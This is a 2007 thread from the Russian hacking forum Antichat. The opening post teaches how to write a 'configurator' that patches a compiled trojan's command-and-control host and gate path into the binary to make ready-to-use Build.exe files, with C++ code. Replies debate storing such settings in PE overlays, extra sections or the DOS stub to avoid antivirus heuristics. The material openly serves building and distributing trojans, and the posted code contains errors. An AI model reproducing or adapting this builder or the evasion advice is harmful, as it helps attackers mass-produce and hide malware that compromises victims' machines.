Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Авторские статьи (https://forum.antichat.xyz/forumdisplay.php?f=31)
-   -   Пишем конфигуратор[c++] (https://forum.antichat.xyz/showthread.php?t=44012)

Ky3bMu4 08.07.2007 16:14
Пишем конфигуратор[c++]
 
Итак, вы написали супер-троя.Трой стучит по стате,непалится антивирусами и т.д. Но вот проблема:каждому юзеру юзающему вашего троя компилить из исходников неудобно! В этой статье я расскажу вам как написать конфигуратор для вашего детища. Всё наше действо будет состоять из 2 частей:

I)Готовим тело троя
II)Сам конфигуратор

Ok, let`s go! (c)

I)
Готовим тело троя.
Компилим трой. Все параметры для отстука по стату(к примеру) должны заканчиваться и начинаться на '_'(нам это нужно будет)
Т.е.
Код:
#define host "_megasite.megahost.com_"
#define path "_/mega777/megagate.php_"
Зачем нам такие длинные имена? Почему бы просто не site.com и /gate.php ? Дело в том, что будем править уже готовый .exe`шник

и "переполнять" там что-то очень нежелательно.
К примеру:
Сделаем site.com, а у кого-нибудь юзера стата на megasite.jino-net.ru , В итоге у него ничего не будет работать.
Теперь я советую переименовать откомпиленый трой в virus.dat(к примеру),чтоб всякие ребята не запускали лишний раз наш ехе.

II)Сам конфигуратор.
Итак тело у нас в virus.dat
Далее буду просто приводить куски кода с комментами.
Объявем 3 глобальные переменные:
Код:
char host[]="site.com";
char path[]="/777/gate.php";
char body[12000];
Для конфигуратора 2 первые параметра нужно брать из Edit`а. Мне ламо приводить всю работу с VCL(тем более, что это

элементарно), поэтому рассмотрим всё на частном случае. Размер body в зависимости от размера файла. Лучше брать размер на

2-3кило больше размера файла.К примеру: вирь весит 15кб размер вы берёте 17000;
Далее:
Код:
DWORD dwBytesRead ,dw ,size , dw1;
HANDLE hFile = CreateFile("virus.dat",GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);

//открываем наше тело
size = GetFileSize(hFile,&dw); //получаем кол-во знаков в файле
ReadFile(hFile,body,size ,&dwBytesRead, NULL); //читаем тело в наш массив
Так далее самый ответственный момент. Ищем и заменяем наши параметры.Для этого напишем отдельнуй функцию.
Код:
void param(void){
int x=0;
int y=1;
int c=0;
while(body[x]!='_'){ //вот для чего нам нужны были '_'. Ищем параметр.
x++;
}
//мы остановились на символе '-'
x++;
//Теперь мы на следующем символе. Посмотрим что это: host или path
if(body[x]=='s'){
//итак это хост. Далее очищаем нужное нам место
while(body[x]!='_'){
body[x]=NULL;
x++;
y++; //чтобы узнать на сколько мы отдалились от '_'
}
//мы остановились на символе '_' .Удаляем его и возвращаемся назад
body[x]==NULL;
x=x-y;
//теперь заполняем наш параметр
while(host[c]!='_'){
body[x]=host[c];
x++;
c++;
}
}
else {
//значит это path. Действия теже самые. Только заменяем host на path
while(body[x]!='_'){
body[x]=NULL;
x++;
y++; //чтобы узнать на сколько мы отдалились от '_'
}
//мы остановились на символе '_' .Удаляем его и возвращаемся назад
body[x]==NULL;
x=x-y;
//теперь заполняем наш параметр
while(path[c]!='_'){
body[x]=path[c];
x++;
c++;
}
}
}
Ну и концовка:
Код:
param();//параметра у нас 2
param();
HANDLE hFile1 = CreateFile("Build.exe",GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_NEW ,FILE_ATTRIBUTE_NORMAL,NULL);
//создаём новый файл
WriteFile(hFile1,body,size,&dw1,NULL); //пишем в него
CloseHandle(hFile); //закрываем оба файла
CloseHandle(hFile1);
Ну вот, в принципе , и всё. Это всё на С++ , но при желании можно переписать на любой язык или переделать не только для параметров статы.

[53x]Shadow 08.07.2007 16:49
Идея интересная, но под стандартный трои конфигураторов имхо дофига. И зачем это в статьи, для этого есть раздел кодинг С++, т.к. кроме исходов здесь больше ничего и нет.
А так если я все правильно понял есть вопросы:
1. "_" - таких символов в исполняемом файле дох... и сочетаний с "s" тоже.
2. А если длина ссылки все-таки больше чем length(host+site)?

Ky3bMu4 08.07.2007 17:08
Цитата:
1. "_" - таких символов в исполняемом файле дох... и сочетаний с "s" тоже.
А вот и нефига. ;)

[53x]Shadow 08.07.2007 17:15
Цитата:
Сообщение от Ky3bMu4
А вот и нефига. ;)
В случайно открытом exe обнаружил 127, из них сочетаний с "s" - 6!
В своем трое - 23, правда сочетаний с "s" нет, но имхо это на удачу...
По-этому лучше использовать сочетание как минимум из трех редко встречаемых символов (те маленькая сигнатура).

Ky3bMu4 08.07.2007 17:19
Ну если и есть такие сочитания, то они походу файла первые. Пробовал на bloodknife`е, моём лоадере, и просто проге вызывающей MessageBox - работает.

Ni0x 08.07.2007 21:34
еще недавно ты называл это билдером ;)

GlOFF 20.09.2007 22:56
Цитата:
Но вот проблема:каждому юзеру юзающему вашего троя компилить из исходников неудобно!
Наоборот это самое то, когда можно править сурсы, менять команды, добавлять мусор и делать индивидуальные сигны! А конфигураторы обычно пишут для того чтобы юзать\менять настройки чужих программ, т.е. когда нет под рукой исходных кодов!

Ky3bMu4 За старания +!

KEZ 20.09.2007 23:52
Цитата:
В своем трое - 23, правда сочетаний с "s" нет, но имхо это на удачу...
По-этому лучше использовать сочетание как минимум из трех редко встречаемых символов (те маленькая сигнатура).
КАКИЕ СОЧЕТАНИЯ???

ИМХО за такие статьи убивать надо, чтоб билдить бинарник, изменяя его по шаблону.
НЕТ СЛОВ ребята, нет слов

ZaCo 20.09.2007 23:57
господи, а почему в конкретную позицию бинарника нельзя писать нужные значения? завел глобальную переменную - и пиши в нее спокойно.
зы нормальный парсинг ехе-файла в общем случае сравним с асм-анализом сего, что крайне не нужно для поставленной задачи. а тут очень опасная реализация: что если функция обьявленная как cdeclaration пойдет на экспорт?

DRON-ANARCHY 21.09.2007 09:18
Блин... во умище... напишите мне кто-нибудь задачку на C++ а то я в нем не шарю, а сдать надо. горит :)

pamba 21.09.2007 12:58
Настройки можно писать оверлеем\в новую секцию\между заголовком и первой секцией\в mz-заголовок в дос-стаб. Не стоит делать так, как сделал ты. Это маразм первой категории.

Ni0x 21.09.2007 13:05
Цитата:
в mz-заголовок в дос-стаб.
Мне кажется эвристику это не понравится. Про стаб вроде обсуждалось на васме.
А вообще, уж лучше билдер тогда писать(оверлей, отдельная секция), чем писать такой конфигуратор. То что сделал ТС, это примитив первой категории, если уж корректно говорить.

_Great_ 23.09.2007 23:20
Цитата:
Сообщение от Ky3bMu4
Ну если и есть такие сочитания, то они походу файла первые. Пробовал на bloodknife`е, моём лоадере, и просто проге вызывающей MessageBox - работает.
Господи, что за бред? Пиши в оверлей и не страдай фигней.

"Маразм крепчал" (С) Вариация Чехова, кажется.

Цитата:
Сообщение от DRON-ANARCHY
Блин... во умище... напишите мне кто-нибудь задачку на C++ а то я в нем не шарю, а сдать надо. горит :)
Умища не так много как кажется

Piflit 23.09.2007 23:36
Цитата:
Сообщение от _Great_
Господи, что за бред? Пиши в оверлей и не страдай фигней.
Можно поподробнее про оверлеи? (как я понимаю, overlay - это код, добавленный после основного кода путем расширения последней секции - седня копался в hiew :) )

GlOFF 24.09.2007 11:58
Цитата:
Можно поподробнее про оверлеи? (как я понимаю, overlay - это код, добавленный после основного кода путем расширения последней секции - седня копался в hiew )
Piflit Оверлей может быть в любом месте файла на диске, и загрузчик винды этот оверлей не пишет в память при загрузке образа файла. PE-Explorer на оверлеи ругается Extra Data :)

_Great_, Ni0x А как эврестики относятся к оверлеям?

Ni0x 24.09.2007 12:13
Нужно думать как эвристик =). Ведь тут особого ума не надо, например эвристик находит секцию ресурсов, начинает анализировать ее, но заместо ресурсов видит левый бинарник, странно неправда ли? Таких примеров можно привести очень много. Насчет оверлея, наверное ни раз играли во флеш игры(exe)? Ну так вот там например бывает, что сам плеер - это основная программа, а непосредственно игра находится в оверлее. Так что ничего против оверлеев эвристик не имеет.


Время: 14:23